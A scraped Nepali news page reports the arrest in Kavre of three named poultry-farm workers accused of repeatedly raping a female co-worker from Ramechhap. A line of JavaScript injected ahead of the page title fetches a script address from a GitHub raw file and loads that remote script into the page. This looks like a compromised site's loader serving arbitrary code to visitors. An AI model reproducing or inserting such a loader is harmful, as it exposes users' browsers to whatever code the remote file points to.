;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापकी महिला बलात्कार गर्ने तीन युवा पक्राउ – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • रामेछापकी महिला बलात्कार गर्ने तीन युवा पक्राउ
दुर्घटना/अपराध

रामेछापकी महिला बलात्कार गर्ने तीन युवा पक्राउ

असोज ०७

काभ्रे । रामेछापका एक महिलालाई बलात्कार गरेको आरोपमा तीन युवालाई प्रहरीले पक्राउ गरेको छ । रामेछाप स्थायी घर भइ हाल काभ्रेको एक फोल्ट्री फर्ममा काम गर्दै आएकी ती महिलाले युवाहरुले आफूलाई जबरजस्ती करणी गरेको उजुरीको आधारमा तीन जनालाई पक्राउ गरेको हो ।

जिल्ला प्रहरी कार्यालय काभ्रेका एसपी रवि पौडेलले आफ्नै सहकर्मी महिलालाई जबरजस्ती करणी गरेको आरोपमा तीन जनालाई पक्राउ गरिएको बताए । उनले भने-महिलाले उजुरी दिए लगत्तै तीन जना युवालाई पक्राउ गरेर अनुसन्धान अगाडि बढाएका छौं ।’

एसपी पौडेलका अनुसार पक्राउ पर्नेमा काभ्रेपलाञ्चोक, महाभारत गाउँपालिका–१ का २२ वर्षीय विशाल आले, मकवानपुरको हेटौँडाका २८ वर्षीय अमृत खड्का र भारतको पश्चिम बङ्गाल वीरभीमका २३ वर्षीय रघुनाथ मण्डल छन् ।

अभियुक्त युवाले महिलालाई धम्की दिई पटकपटक जबरजस्ती करणी गरेको प्रारम्भिक अनुसन्धानबाट खुलेको प्रहरीले बताएको छ । पक्राउ पर्ने तीनै जना युवा पोल्ट्री फर्ममा काम गर्ने मजदुर हुन् ।file Photo

फेसबुक प्रतिक्रियाहरु